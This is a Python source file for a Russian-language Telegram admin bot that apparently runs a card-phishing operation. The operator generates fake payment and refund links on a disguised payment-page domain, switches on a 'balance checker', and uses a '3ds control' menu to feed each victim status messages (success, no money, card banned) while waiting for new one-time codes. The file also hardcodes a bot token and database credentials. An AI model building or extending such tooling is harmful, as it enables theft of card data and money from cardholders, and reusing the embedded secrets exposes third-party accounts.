-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbot.py
546 lines (491 loc) · 22.1 KB
/
bot.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
# -*- coding: utf-8 -*-
import time
import telebot
from telebot import types
from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton
import mysql.connector
from datetime import datetime
import sys
import hashlib
import random
import string
TOKEN = '2071639695:AAHqW490PDkt3FHgzj4gh-0Oe1ExVPopw6o' #API тестовый
adminList = [2019219922]; # Админы
# База данных
mydb = mysql.connector.connect(
host="sr40.hostlife.net",
user="booga198_Adm",
password="090501",
database="booga198_Card"
)
mydb.ping(True)
mycursor = mydb.cursor()
# mycursor.execute("DROP table settings,path")
try:
mycursor.execute("CREATE TABLE path (id INT AUTO_INCREMENT PRIMARY KEY, link VARCHAR(255), creator VARCHAR(255),method BOOLEAN, sum INT, x INT, ip VARCHAR(255), cheker BOOLEAN, success BOOLEAN, nomoney BOOLEAN, limited BOOLEAN, error BOOLEAN, threeds BOOLEAN, disablepay BOOLEAN, cardban BOOLEAN, notrucard BOOLEAN)")
print("*создаём таблицу путей")
except Exception as e:
print("таблица путей имеется")
# print(e)
try:
mycursor.execute("CREATE TABLE settings (id INT AUTO_INCREMENT PRIMARY KEY, domain VARCHAR(255), ip VARCHAR(255),token VARCHAR(255))")
sql = "INSERT INTO settings (domain,ip,token) VALUES (%s,%s,%s)"
val = ("http://paymaster.ru", "Plati.ru", TOKEN);
mycursor.execute(sql,val)
mydb.commit()
print("*создаём таблицу настроек")
except Exception as e:
print("таблица настроек имеется")
mycursor.close()
def listener(messages):
for m in messages:
if m.content_type == 'text':
# print the sent message to the console
print(str(m.chat.first_name) + " [" + str(m.chat.id) + "]: " + m.text)
print("stepFlag = " + str(stepFlag))
bot = telebot.TeleBot(TOKEN)
bot.set_update_listener(listener) # register listener
def backButton(cid,txt):
markup = types.ReplyKeyboardMarkup(resize_keyboard=True,one_time_keyboard=False)
markup.row(types.KeyboardButton('Назад'))
bot.send_message(cid, txt, reply_markup=markup, parse_mode= "Markdown")
hideBoard = types.ReplyKeyboardRemove()
def adminMainMenu(cid, txt):
markup = types.ReplyKeyboardMarkup(resize_keyboard=True,one_time_keyboard=False)
markup.row(types.KeyboardButton('ℹ️Управление 3ds'))
markup.row(types.KeyboardButton('▶️Оплата'), types.KeyboardButton('◀️Возврат'))
markup.row(types.KeyboardButton('⏫Список'),types.KeyboardButton('🚮Удаление'))
markup.row(types.KeyboardButton('🔣Настройки'))
# markup.row(types.KeyboardButton('🈁Url платежки'))
bot.send_message(cid, txt, reply_markup=markup, parse_mode= "Markdown")
hideBoard = types.ReplyKeyboardRemove()
def adminSettingsMenu(cid,txt):
markup = types.ReplyKeyboardMarkup(resize_keyboard=True,one_time_keyboard=False)
markup.row(types.KeyboardButton('🈁Url платежки'))
markup.row(types.KeyboardButton('🔤Организация на странице оплаты'))
markup.row(types.KeyboardButton('Назад'))
bot.send_message(cid, txt, reply_markup=markup, parse_mode= "Markdown")
hideBoard = types.ReplyKeyboardRemove()
def form3dsMenu(cid,txt):
markup = types.ReplyKeyboardMarkup(resize_keyboard=True,one_time_keyboard=False)
markup.row(types.KeyboardButton('Успешно'),types.KeyboardButton('Нет денег'))
markup.row(types.KeyboardButton('Неизвестная ошибка'),types.KeyboardButton('Лимит'))
markup.row(types.KeyboardButton('Ошибка 3ds'),types.KeyboardButton('Запрещена онлайн оплата'))
markup.row(types.KeyboardButton('Бан карты'),types.KeyboardButton('Карта не РФ'))
markup.row(types.KeyboardButton('Назад'))
bot.send_message(cid, txt, reply_markup=markup, parse_mode= "Markdown")
hideBoard = types.ReplyKeyboardRemove()
summa = "";
checker = 0;
method = 0
stepFlag = 0; # главное меню
#---------------------------------------------------------------
@bot.message_handler(commands=['start'])
def command_start(m):
cid = m.chat.id
if cid in adminList:
adminMainMenu(cid,"Главное меню")
#---------------------------------------------------------------
@bot.message_handler(func=lambda message: message.text == 'Назад')
def command_rules(m):
global stepFlag
cid = m.chat.id
if stepFlag==10 or stepFlag==0 or stepFlag==31 or stepFlag == 20 or stepFlag == 30 or stepFlag == 25 or stepFlag == 11 or stepFlag == 12 or stepFlag == 15 or stepFlag == 16 or stepFlag == 17:
adminMainMenu(cid,"Главное меню")
stepFlag = 0
elif stepFlag == 21 or stepFlag == 22:
stepFlag = 20
adminSettingsMenu(cid,"Настройки платежки и страницы оплаты")
@bot.message_handler(func=lambda message: message.text == '▶️Оплата')
def command_rules(m):
global stepFlag
global method
cid = m.chat.id
if cid in adminList:
backButton(cid,"Укажи сумму оплаты?⏬")
stepFlag = 10
method = 0;
@bot.message_handler(func=lambda message: message.text == '◀️Возврат')
def command_rules(m):
global stepFlag
global method
cid = m.chat.id
if cid in adminList:
backButton(cid,"Укажи сумму возврата?⏬")
stepFlag = 15
method = 1;
@bot.message_handler(func=lambda message: message.text == '🔣Настройки')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList:
adminSettingsMenu(cid,"Настройки платежки и страницы оплаты")
stepFlag = 20
@bot.message_handler(func=lambda message: message.text == '🈁Url платежки')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "SELECT domain FROM settings WHERE id = 1"
mycursor.execute(sql)
myresult = mycursor.fetchone()
mycursor.close()
except Exception as e:
print(e)
backButton(cid,"Текущий адресс платёжки: " +str(myresult[0])+ "\nДля установки нового адреса, вбейте его ниже⏬\n⚠️Адресс вводится без HTTP:// и слешей вконце⚠️")
stepFlag = 21
@bot.message_handler(func=lambda message: message.text == '🔤Организация на странице оплаты')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "SELECT ip FROM settings WHERE id = 1"
mycursor.execute(sql)
myresult = mycursor.fetchone()
mycursor.close()
except Exception as e:
print(e)
backButton(cid,"Текущий организация: " +str(myresult[0])+ "\nДля установки названия, вбейте его ниже⏬")
stepFlag = 22
@bot.message_handler(func=lambda message: message.text == '📌Создать📌')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList and (stepFlag == 12 or stepFlag == 17 ):
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "SELECT * FROM settings WHERE id = 1"
mycursor.execute(sql)
myresult = mycursor.fetchone()
mycursor.close()
result = hashlib.md5(str(random.randint(0,800000)).encode()).hexdigest()
linkgen = str(myresult[1]) + '/payments/' + result[0:8] +'-'+ result[8:16] +'-'+ result[16:24] +'-'+ result[24:32]
mycursor = mydb.cursor()
sql = "INSERT INTO path (link,creator,method,sum,x,ip,cheker,success,nomoney,limited,error,threeds,disablepay,cardban,notrucard) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
val = (linkgen,cid,method,summa,2,myresult[2],checker,0,0,0,0,0,0,0,0)
mycursor.execute(sql, val)
mydb.commit()
mycursor.close()
mycursor = mydb.cursor()
sql = "SELECT id FROM path WHERE link = %s"
val = (linkgen,)
mycursor.execute(sql,val)
myresult = mycursor.fetchone()
mycursor.close()
adminMainMenu(cid,"Ваша ссылка:\n"+linkgen+'\nID для 3ds управления: ' + str(myresult[0]) )
except Exception as e:
bot.send_message(cid, e, parse_mode= "Markdown")
@bot.message_handler(func=lambda message: message.text == '⏫Список')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList:
try:
mydb.ping(True)
mycursor = mydb.cursor(buffered=True)
sql = "SELECT id,link,method,sum,cheker FROM path"
mycursor.execute(sql)
myresult = mycursor.fetchall()
mycursor.close()
i = 0
for x in myresult:
bot.send_message(cid, "ID - " + str(myresult[i][0])+ " | Сумма: " + str(myresult[i][3]) + " | Метод (1-возврат) - " + str(myresult[i][2]) + "\nСсылка: " + str(myresult[i][1]), parse_mode= "Markdown")
i=i+1
adminMainMenu(cid,"Главное меню: ")
except Exception as e:
bot.send_message(cid, e, parse_mode= "Markdown")
@bot.message_handler(func=lambda message: message.text == '🚮Удаление')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList:
backButton(cid,"Укажите ID ссылки для удаления. 0 - удалить всё")
stepFlag = 25;
@bot.message_handler(func=lambda message: message.text == 'ℹ️Управление 3ds')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList:
stepFlag = 30;
backButton(cid,"Введите ID ссылки для управления:")
#------------------------------------------------------------------------------------------------
@bot.message_handler(func=lambda message: message.text == 'Успешно')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList and stepFlag == 31:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "UPDATE path SET success = 1 WHERE id = %s"
val = (control[0],)
mycursor.execute(sql, val)
mydb.commit()
mycursor.close()
except Exception as e:
bot.send_message(cid, e)
form3dsMenu(cid,"Оплата подтверждена. Ожидаем новый код подтверждения")
@bot.message_handler(func=lambda message: message.text == 'Нет денег')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList and stepFlag == 31:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "UPDATE path SET nomoney = 1 WHERE id = %s"
val = (control[0],)
mycursor.execute(sql, val)
mydb.commit()
mycursor.close()
except Exception as e:
bot.send_message(cid, e)
form3dsMenu(cid,"На карте нет денег.")
@bot.message_handler(func=lambda message: message.text == 'Неизвестная ошибка')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList and stepFlag == 31:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "UPDATE path SET error = 1 WHERE id = %s"
val = (control[0],)
mycursor.execute(sql, val)
mydb.commit()
mycursor.close()
except Exception as e:
bot.send_message(cid, e)
form3dsMenu(cid,"Произошла неизвестная ошибка при оплате.")
@bot.message_handler(func=lambda message: message.text == 'Лимит')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList and stepFlag == 31:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "UPDATE path SET limited = 1 WHERE id = %s"
val = (control[0],)
mycursor.execute(sql, val)
mydb.commit()
mycursor.close()
except Exception as e:
bot.send_message(cid, e)
form3dsMenu(cid,"На карте закончился лимит по переводам.")
@bot.message_handler(func=lambda message: message.text == 'Ошибка 3ds')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList and stepFlag == 31:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "UPDATE path SET threeds = 1 WHERE id = %s"
val = (control[0],)
mycursor.execute(sql, val)
mydb.commit()
mycursor.close()
except Exception as e:
bot.send_message(cid, e)
form3dsMenu(cid,"Ошибка 3ds.")
@bot.message_handler(func=lambda message: message.text == 'Запрещена онлайн оплата')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList and stepFlag == 31:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "UPDATE path SET disablepay = 1 WHERE id = %s"
val = (control[0],)
mycursor.execute(sql, val)
mydb.commit()
mycursor.close()
except Exception as e:
bot.send_message(cid, e)
form3dsMenu(cid,"На карте выключена функция онлайн оплаты.")
@bot.message_handler(func=lambda message: message.text == 'Бан карты')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList and stepFlag == 31:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "UPDATE path SET cardban = 1 WHERE id = %s"
val = (control[0],)
mycursor.execute(sql, val)
mydb.commit()
mycursor.close()
except Exception as e:
bot.send_message(cid, e)
form3dsMenu(cid,"Карта забанена.")
@bot.message_handler(func=lambda message: message.text == 'Карта не РФ')
def command_rules(m):
global stepFlag
cid = m.chat.id
if cid in adminList and stepFlag == 31:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "UPDATE path SET notrucard = 1 WHERE id = %s"
val = (control[0],)
mycursor.execute(sql, val)
mydb.commit()
mycursor.close()
except Exception as e:
bot.send_message(cid, e)
form3dsMenu(cid,"Карта не Российскрго банка.")
#----------------------------------------------------------------------------------------------
control = ()
@bot.message_handler(func=lambda message: True, content_types=['text'])
def command_default(m):
global stepFlag
global summa
global checker
global control
cid = m.chat.id
text = m.text
if stepFlag == 10:
summa = text;
backButton(cid,"Включить чекер баланса? (Да/Нет)")
stepFlag = 11;
elif stepFlag == 11:
if text == "Да" or text == "да" or text == "ДА":
checker = 1;
stepFlag = 12
txt = "Всё готово к созданию ссылки:\nТип - оплата\nСумма - "+summa+"\n Чекер - Включен"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True,one_time_keyboard=False)
markup.row(types.KeyboardButton('📌Создать📌'))
markup.row(types.KeyboardButton('Назад'))
bot.send_message(cid, txt, reply_markup=markup, parse_mode= "Markdown")
hideBoard = types.ReplyKeyboardRemove()
elif text == "Нет" or text == "нет" or text == "НЕТ":
checker = 0
stepFlag = 12
txt = "Всё готово к созданию ссылки:\nТип - Оплата\nСумма - "+summa+"\n Чекер - Выключен"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True,one_time_keyboard=False)
markup.row(types.KeyboardButton('📌Создать📌'))
markup.row(types.KeyboardButton('Назад'))
bot.send_message(cid, txt, reply_markup=markup, parse_mode= "Markdown")
hideBoard = types.ReplyKeyboardRemove()
else:
bot.send_message(cid, "Нужно ответить да или нет", parse_mode= "Markdown")
elif stepFlag == 15:
stepFlag = 16;
summa = text
backButton(cid,"Включить чекер баланса? (Да/Нет)")
elif stepFlag == 16:
if text == "Да" or text == "да" or text == "ДА":
checker = 1;
stepFlag = 17
txt = "Всё готово к созданию ссылки:\nТип - Возврат\nСумма - "+summa+"\n Чекер - Включен"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True,one_time_keyboard=False)
markup.row(types.KeyboardButton('📌Создать📌'))
markup.row(types.KeyboardButton('Назад'))
bot.send_message(cid, txt, reply_markup=markup, parse_mode= "Markdown")
hideBoard = types.ReplyKeyboardRemove()
elif text == "Нет" or text == "нет" or text == "НЕТ":
checker = 0
stepFlag = 17
txt = "Всё готово к созданию ссылки:\nТип - Оплата\nСумма - "+summa+"\n Чекер - Выключен"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True,one_time_keyboard=False)
markup.row(types.KeyboardButton('📌Создать📌'))
markup.row(types.KeyboardButton('Назад'))
bot.send_message(cid, txt, reply_markup=markup, parse_mode= "Markdown")
hideBoard = types.ReplyKeyboardRemove()
else:
bot.send_message(cid, "Нужно ответить да или нет", parse_mode= "Markdown")
elif stepFlag == 21:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "UPDATE settings SET domain = %s WHERE id = 1"
val = (text,)
mycursor.execute(sql, val)
mydb.commit()
mycursor.close()
stepFlag = 20
adminSettingsMenu(cid, "Новый адресс платежки установлен:\n"+text)
except Exception as e:
print(e)
elif stepFlag == 22:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "UPDATE settings SET ip = %s WHERE id = 1"
val = (text,)
mycursor.execute(sql, val)
mydb.commit()
mycursor.close()
stepFlag = 20
adminSettingsMenu(cid, "Новое название организации:\n"+text)
except Exception as e:
print(e)
elif stepFlag == 25:
if text == '0':
try:
mycursor = mydb.cursor()
mycursor.execute("DELETE FROM path")
adminMainMenu(cid,"Все ссылки удалены!")
stepFlag = 0;
except Exception as e:
bot.send_message(m.chat.id, e)
else:
try:
mycursor = mydb.cursor()
sql = "DELETE FROM path WHERE id = %s"
adr = (text, )
mycursor.execute(sql, adr)
mydb.commit()
adminMainMenu(cid,"Ссылка удалена!")
stepFlag = 0;
except Exception as e:
bot.send_message(m.chat.id, e)
elif stepFlag == 30:
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "SELECT * FROM path WHERE id = %s"
val = (text,)
mycursor.execute(sql,val)
myresult = mycursor.fetchone()
mycursor.close()
except Exception as e:
print(e)
if myresult == None:
backButton(cid, 'Ссылка не найдена. Введите корректный ID ссылки:')
else:
control = myresult
stepFlag = 31
form3dsMenu(cid,"Форма управления 3DS")
#---------------------------------------------------------------------------------------------------
@bot.callback_query_handler(func=lambda call: True)
def callback_query(call):
global newAgent
cid = call.message.chat.id
if call.data == "success":
form3dsMenu(cid,"Оплата подтверждена.\nОжидаем новый одноразовый код!")
bot.delete_message(call.message.chat.id, call.message.id)
try:
mydb.ping(True)
mycursor = mydb.cursor()
sql = "UPDATE path SET success = 1 WHERE id = %s"
val = (control[0],)
mycursor.execute(sql, val)
mydb.commit()
mycursor.close()
except Exception as e:
bot.send_message(call.message.chat.id, e)
elif call.data == "declineUsers":
bot.delete_message(call.message.chat.id, call.message.id)
form3ds(cid)
bot.polling()